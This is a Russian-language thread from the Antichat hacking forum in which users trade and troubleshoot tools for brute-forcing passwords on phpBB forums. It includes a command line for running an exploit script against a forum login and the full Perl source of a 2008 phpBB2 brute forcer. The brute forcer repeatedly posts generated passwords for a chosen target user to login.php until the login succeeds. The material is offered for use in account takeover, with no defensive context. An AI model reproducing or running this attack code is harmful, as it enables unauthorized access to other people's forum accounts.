Форум АНТИЧАТ - phpbb bruteforcer

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - phpbb bruteforcer (https://forum.antichat.xyz/showthread.php?t=74410)

конечно существуетюзай поиск сдесь K1borg писал
вот ссылко
http://forum.antichat.ru/showpost.php?p=474307&postcount=7
ЗЫ и впредь ЮЗЬ поиск

здрасте приехали это все таки брутер а не миксер блин

Да мне тоже интерестно как?=)

выдрать - собрать словарь - пробрутить.

тоже попробовал - давно юзаю этот .pl, но именно с брутом непонятки - зарегился на форуме, сделал в той же папке, где и phpbb.pl файл pass.txt, в нем ТОЛЬКО один мой пароль (правильный), запускаю, начинается брут, НО РЕЗУЛЬТАТЫ никуда не сохраняются и в процессе работы ничего не показывается (т.е. в других режимах все пишется в log.txt - а в режиме брута вообще трудно понять, делается ли что-нибудь в принципе, и если есть ошибки - то какие. Запускаю так (чтобы все видно было):

cmd /k C:\Perl\bin\wperl.exe C:\Perl\bin\Sploits\phpbb.pl -v3 -uhttp://forum/index.php -lVassia -fpass.txt

т.е. брут не работает, или где?:) Версия форума 2.020

Инфо о форуме включая серверный путь успешно выдрал. При сканировании неподдерживаемых версий форума скрипт в лог все-равно пишет "ну не могу я поломать". А тут тишина.

Код:

#!/usr/bin/perl



use IO::Socket;

use LWP::UserAgent;

use HTTP::Cookies;

use Time::HiRes qw(gettimeofday);



$host = $ARGV[0];

$usern = $ARGV[1];

$passw = $ARGV[2];

$uname = $ARGV[3];

$url = "http://".$host;

$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset

$charcount = 24; #number of chars in $alpha

$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.

$count = 0;

$logins = 0;

$minchars = 1; #min chars

$maxchars = 10; #max chars



print q(

###########################################################

#                 phpBB2 brute forcer                     #

#              http://www.unnamedone.com                  #

#               brian_denys@hotmail.com                   #

#                  12 - April - 2008                      #

################## Coded By UnnamedOne ####################

);



if (@ARGV < 4)

{

   print " #  I am not responsible for anything that you do with this!\n";

   print " #  This has been tested on phpBB2!\n";

   print " #  usage : phpbb2.pl [host & path] [user] [pass] [target]\n";

   print " #  E.g : phpbb2.pl www.milw0rm.com/phpBB2/ UnnamedOne MyPass str0ke\n";

   exit();

}



fakelogin();

for(my $t=$minchars;$t<=$maxchars;$t++)

{

   crack($t);

}



sub fakelogin

{

   $xplr = LWP::UserAgent->new() or die;

   $cookie_jarr = HTTP::Cookies->new();

   $xplr->cookie_jar( $cookie_jarr );

   $resr = $xplr->post($url.'login.php',

   Content => [

   "username"   => "$usern",

   "password"   => "$passw",

   "login"      => "Log in",

   "newregister"   => "Register",

   ],);

   if($cookie_jarr->as_string =~ /%22%3B%7D/) {

      #Do nothing..

   }

   else

   {

      print $cookie_jarr->as_string;

      print "Forum not vulnerable or wrong username / password.\n";

      exit();

   }

}



sub crack

{

   $xpl = LWP::UserAgent->new() or die;

   $cookie_jar = HTTP::Cookies->new();

   $CharSet = shift;

   @RawString = ();

   for (my $i =0;$i<$CharSet;$i++)

   {

      $RawString[i] = 0;

   }

   $Start = gettimeofday();

   do {

      for (my $i =0;$i<$CharSet;$i++) {

         if ($RawString[$i] > length($alpha)-1) {

            if ($i==$CharSet-1)

            {

               $cnt = 0;

               return false;

            }

            $RawString[$i+1]++;

            $RawString[$i]=0;

         }

      }

      $ret = "";

      for (my $i =0;$i<$CharSet;$i++) {

         $ret = $ret . substr($alpha,$RawString[$i],1);

      }

      $count++;

      if($count == 4) {

         #fakelogin();

         $count = 0;

      }

      $xpl->cookie_jar( $cookie_jar );

      $res = $xpl->post($url.'login.php',

      Content => [

      "username"   => "$uname",

      "password"   => "$ret",

      "login"      => "Log in",

      "newregister"   => "Register",

      ],);

      $cnt++;

      $Stop = gettimeofday();

      if ($Stop-$Start>$dbgtmr) {

         $cnt = int($cnt/$dbgtmr);

         $Start = gettimeofday();

      }

      $logins++;

      system("clear");

      $pro = ($logins / ($charcount * $maxchars));

      print "Current password: $ret\n";

      print "Login attempts: $logins\n";

      print "Cracking speed: $cnt passwords/sec\n";

      print "$pro% finished.\n";

      $cnt = 0;

      if($cookie_jar->as_string =~ /%22%3B%7D/) {

         print "Password cracked! => $ret\n";

         exit();

      }

      $RawString[0]++;

   }while($RawString[$CharSet-1]<length($alpha));

}

Если не трудно, как расшифровать эту строчку:

usage : phpbb2.pl [host & path] [user] [pass] [target]\n

В принципе понятно, только непонятно откуда что берется:)

И особенно с target непонятно. Здесь вообще брут по словарю одного юзера или что?

Запускаю - ноль эмоций, ни сообщений об ошибке, ничего вообще

Я понимаю, что пример есть:

E.g : phpbb2.pl www.milw0rm.com/phpBB2/ UnnamedOne MyPass str0ke\n

что такое в данном случае UnnamedOne, MyPass и str0ke\n???

Имя юзера какого-то, какой-то мой Пароль и строка какая-то:)